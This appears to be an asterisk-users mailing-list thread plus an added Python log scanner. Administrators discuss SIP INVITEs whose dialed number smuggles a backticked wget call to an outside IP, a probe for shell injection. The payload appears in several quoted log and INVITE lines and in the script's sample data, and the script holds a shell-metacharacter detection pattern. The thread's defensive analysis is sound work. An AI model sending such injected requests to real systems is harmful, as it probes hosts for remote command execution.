[asterisk-users] new sort of shell attack attempt via SIP?
I have seen this recently in my logs as well:

[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp(SIP/5060-002c, Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`;) in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set(SIP/5060-002c, DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`;) in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto(SIP/5060-002c, s,1) in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1)
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf(SIP/5060-002c, 0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1;) in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1)

So can this be blocked via fail2ban by adding a new REGEX?

Thanks
Saqib

--
This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean.

--
Bandwidth and Colocation Provided by http://www.api-digital.com --
New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello
asterisk-users mailing list
To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users
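As an added example (not from this thread or from the Asterisk project), here is a small detector that scans Asterisk "Executing [exten@context:prio]" verbose lines like the ones above for shell metacharacters in the dialed extension and pulls out any callback URL. It assumes the stock verbose log format shown in the thread; note that these VERBOSE lines do not contain the sending peer's IP, so a fail2ban failregex (which needs a <HOST> capture) cannot be built from them alone and must match a log line or SIP trace that carries the source address.

```python
import re

# Constructed sample: the hostile dialplan line quoted in the thread, the Goto
# target it lands in, and a benign call so the detector has something to skip.
SAMPLE_LOG = r"""
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp(SIP/5060-002c, Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`;) in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf(SIP/5060-002c, 0?from-trunk,...) in new stack
[2011-09-10 20:35:01] VERBOSE[14939] logger.c: -- Executing [18005551212@from-sip-external:1] NoOp(SIP/5060-002d, normal call) in new stack
"""

# exten@context:priority as printed by Asterisk's "Executing [...]" verbose line.
EXEC_RE = re.compile(r"Executing \[(?P<exten>.*?)@(?P<context>[^:\]]+):(?P<prio>\d+)\]")
# Characters that have no place in a dialed number unless someone hopes it reaches a shell.
SHELL_META_RE = re.compile(r"[`$;|&]")
# Asterisk prints spaces and control bytes in the verbose log as \xHH.
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
URL_RE = re.compile(r"https?://[^\s`'\"]+")


def decode_asterisk_escapes(text):
    """Undo the \\xHH escaping so the injected string reads as the sender wrote it."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def find_shell_probes(log_text):
    """Return one record per dialplan line whose extension carries shell metacharacters.

    Each record holds the context, the decoded extension and any URLs found in it
    (the callback host the probe reports to), which is what an analyst would want
    to block or correlate with a SIP capture that shows the sending address.
    """
    hits = []
    for line in log_text.splitlines():
        m = EXEC_RE.search(line)
        if not m or not SHELL_META_RE.search(m.group("exten")):
            continue
        exten = decode_asterisk_escapes(m.group("exten"))
        hits.append({
            "context": m.group("context"),
            "exten": exten,
            "urls": URL_RE.findall(exten),
        })
    return hits


if __name__ == "__main__":
    for hit in find_shell_probes(SAMPLE_LOG):
        print(hit)
```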
[asterisk-users] new sort of shell attack attempt via SIP?
I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file. I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94).

(This happens to be my honeypot that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-) )

INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.

Does Asterisk have shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI?

Tom
Re: [asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:05 PM, Tom Browning wrote:

> INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.

My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link.

A more sophisticated variant of that would embed script tags with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack.

--
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
Re: [asterisk-users] new sort of shell attack attempt via SIP?
I disagree with the 'review CDR' angle for a number of reasons:

a) there is a backtick in the URI trying to force shell and the proper wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just be empty (for log scraping), url safety checks confirm
c) the invites were sprayed across my entire IP address range

To me, this is more like a scan for any SIP host that has shell injection vulnerability. The list of vulnerable hosts is just a log scrape away at the server 91.223.89.94

On Sun, Sep 11, 2011 at 7:20 PM, Alex Balashov abalas...@evaristesys.com wrote:

> On 09/11/2011 07:05 PM, Tom Browning wrote:
>
> > INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
>
> My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link.
>
> A more sophisticated variant of that would embed script tags with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack.
Re: [asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:35 PM, Tom Browning wrote:

> I disagree with the 'review CDR' angle for a number of reasons:
>
> a) there is a backtick in the URI trying to force shell and the proper wget command line to send results to /dev/null
> b) the V.php (at the url) appears to do nothing at all and might just be empty (for log scraping), url safety checks confirm
> c) the invites were sprayed across my entire IP address range
>
> To me, this is more like a scan for any SIP host that has shell injection vulnerability. The list of vulnerable hosts is just a log scrape away at the server 91.223.89.94

On second thought, your interpretation does make much more sense. :-)

--
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/